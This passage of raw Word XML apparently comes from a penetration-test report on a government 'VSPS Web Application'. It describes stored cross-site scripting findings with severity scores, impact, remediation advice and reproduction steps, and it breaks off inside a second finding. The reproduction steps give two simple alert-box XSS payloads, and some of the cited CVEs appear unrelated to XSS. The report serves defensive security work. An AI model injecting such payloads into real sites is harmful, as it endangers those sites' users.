        <w:t>• https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC9DBBE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://nvd.nist.gov/general/search/results?query=cors&amp;form_type=basic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFFD20E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2A283F"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4CAA1C44"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1556C577" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Stored Cross-Site Scripting (XSS)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3CE23222" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH CVSS 7.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="350B3558"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0BE1593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A0A463E"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3560C3" w14:textId="69D660F1"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026</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5CDE112"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6404D47" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.3 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="0F55164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F274959"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135BD0B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A03:2021-Injection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5A1FD15"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276B6F1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-79</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="0AC4DC6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E434F82"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74DFD8B"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604680E"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218C186" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="3B213A8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D47B056"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244B312"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09669F2"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56B296E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="650AE53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4CE1CAA"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22E6944"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98948CA"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BA6D96" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="0DAB7071"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E093584" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE References</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4250" w:type="pct"/>
            <w:gridSpan w:val="3"/>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tcPr>
          <w:p w14:paraId="7256F96B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>https://nvd.nist.gov/vuln/detail/CVE-2023-38031, https://nvd.nist.gov/vuln/detail/CVE-2023-28432</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05054831" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AF2890" w14:textId="4025339A" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Stored Cross-Site Scripting (XSS) occurs when an attacker injects malicious client-side script into a web application, and this script is permanently stored on the target server. Subsequently, when other users access the affected web page, their browsers retrieve and execute this malicious script without proper validation or encoding. The root cause of this vulnerability is the application's failure to adequately validate and sanitize user-supplied input before storing it in a persistent data store (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a database</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) and/or a lack of context-aware output encoding when displaying this stored data back to users. Exploitation works by an attacker submitting crafted input containing JavaScript code to a vulnerable input field (e.g., a comment section, user profile field, or forum post). This malicious input is then saved on the server. When any legitimate user later accesses the page where this stored data is displayed, their browser executes the attacker's script. This allows the attacker to steal session cookies, deface web pages, redirect users to malicious sites, perform actions on behalf of the victim, or even compromise the user's browser via drive-by downloads. The attack surface typically involves any user-controlled input field that stores data persistently and later renders it in a web page without sufficient security controls. For the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web Application, this could include user profiles, message boards, administrative interfaces, or any feature allowing user-generated content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B3EEF5" w14:textId="51177432" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E31442" w14:textId="2FA37947" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A Stored Cross-Site Scripting (XSS) vulnerability in the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web Application poses a significant risk to the government agency, potentially leading to severe financial, reputational, and operational consequences. The primary impact is the unauthorized access to sensitive government data, including personally identifiable information (PII) of citizens or employees, or even classified information, which could be exfiltrated through compromised user sessions. This directly violates confidentiality and integrity principles. Financial implications include the substantial cost of incident response, forensic investigations, legal fees, and potential regulatory fines associated with data breaches under frameworks like NIST CSF. Given the government industry context, a data breach involving critical systems could lead to a massive erosion of public trust and severe reputational damage to the agency, affecting citizen confidence and potentially hindering operations. Furthermore, an attacker could deface public-facing portals, propagate malware to visitors, or manipulate displayed information, undermining the integrity and reliability of official communications and data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078CE725" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438C2EA3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">STRATEGIC FIX (Architecture): Implement a comprehensive Secure Software Development Lifecycle (SSDLC) that mandates security reviews, threat modeling, and code analysis for all new features and updates. Adopt a robust Web Application Firewall (WAF) to provide an immediate layer of protection by filtering malicious requests and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>responses. Standardize on a security-first framework or library that includes built-in, context-aware output encoding capabilities. Establish a centralized policy for all user-supplied data handling, ensuring that no user input is ever rendered directly without strict validation and encoding. Consider adopting a Content Security Policy (CSP) that defines trusted sources of content, mitigating the impact of any successfully injected scripts. Implement an identity and access management system with strong authentication and session management to reduce the impact of stolen session tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E605E4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A7D047F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TACTICAL FIX (Code Implementation): Implement strict input validation on all user-supplied data fields. This should involve whitelisting allowed characters, data types, and formats, rather than blacklisting. For example, if a field is expected to contain only alphanumeric characters, reject any input containing script tags or special characters commonly used in XSS payloads. Apply context-aware output encoding to all user-supplied data before it is rendered in HTML. Different encoding schemes are required for different HTML contexts (e.g., HTML entity encoding for main content, JavaScript encoding for script blocks, URL encoding for URLs). Avoid using unsafe JavaScript functions like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(), or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>eval(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) with user-controlled data. For the existing Struts 1 application, ensure that any custom tags or JSP logic responsible for rendering user input apply encoding appropriate for the output context. Regularly update and patch all components, including the Struts 1 framework (or migrate away from it, as it is end-of-life) and any associated libraries, to address known vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092261F8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071514CE" w14:textId="496CB641" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Identify an input field that accepts user-generated content and is subsequently displayed to other users (e.g., a comment section, profile description, or message board post). 2. As an authenticated attacker, navigate to this input field in the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web Application. 3. Enter a malicious script payload into the input field. For example: &lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'XSS Vulnerability!</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>');&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/script&gt; or &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'XSS Vulnerability!</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>');&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. Submit the input. The application will store this payload in its backend database. 5. Log in as a different legitimate </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user, or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> access the application page where the previously submitted content is displayed. 6. Observe that the malicious script is executed in the legitimate user's browser, displaying an alert box with 'XSS Vulnerability!' or similar, indicating a successful XSS exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECBCEAB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC459EC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://owasp.org/www-community/attacks/xss/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BAB0D7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cwe.mitre.org/data/definitions/79.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331EF68E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://nvd.nist.gov/vuln/detail/CVE-2023-38031</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E5863E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://nvd.nist.gov/vuln/detail/CVE-2023-28432</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115BDE81" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://portswigger.net/web-security/cross-site-scripting/stored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C73B682" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2D632E"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46C657F2"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3E42C044" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Stored Cross-Site Scripting (XSS)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21D6C167" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH CVSS 8.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4228BC5A"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2C174731"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FCE8F94"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66F42A" w14:textId="3F566246"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025</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2B1A91A"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4B12CFA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.2 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="29EEF54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412EA83"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BB508C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A03:2021-Injection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10DE41A"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CF479BB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-79</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="35A9C5C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F450979"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6894EE2"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CA40B77"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C58CC7E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="6093A99E"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15527C"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60A4E2A"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4658969"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655470E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="657201C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BDF01D2"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5558C96"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FF3247"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238BB30" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="4342EB4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1BABA88" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE References</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4250" w:type="pct"/>
            <w:gridSpan w:val="3"/>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tcPr>
          <w:p w14:paraId="5392D6AF" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>https://nvd.nist.gov/vuln/detail/CVE-2022-22964, https://nvd.nist.gov/vuln/detail/CVE-2021-21972</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7948548F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E0EF61" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Stored Cross-Site Scripting (XSS) occurs when a web application takes user-supplied input, stores it in a database or other persistent storage, and later displays it to other users or administrators without proper validation or encoding. The root cause is the failure to neutralize or incorrectly neutralize special elements within the stored data before it is rendered by a web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>browser.Exploitation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> works by an attacker submitting malicious script code (e.g., JavaScript) into an input field that is subsequently saved by the application. When another user views a page that retrieves and displays this stored malicious data, their web browser executes the script. This can lead to various attacks, including session hijacking (stealing cookies), website defacement, redirection to malicious sites, phishing attacks, or performing actions on behalf of the victim without their </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>consent.Affected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> components typically include any user input fields that store data, such as comment sections, profile fields, forums, or administrative content management interfaces. The attack surface extends to any pages that dynamically display this stored user-generated content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4C38C6" w14:textId="002451CE" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
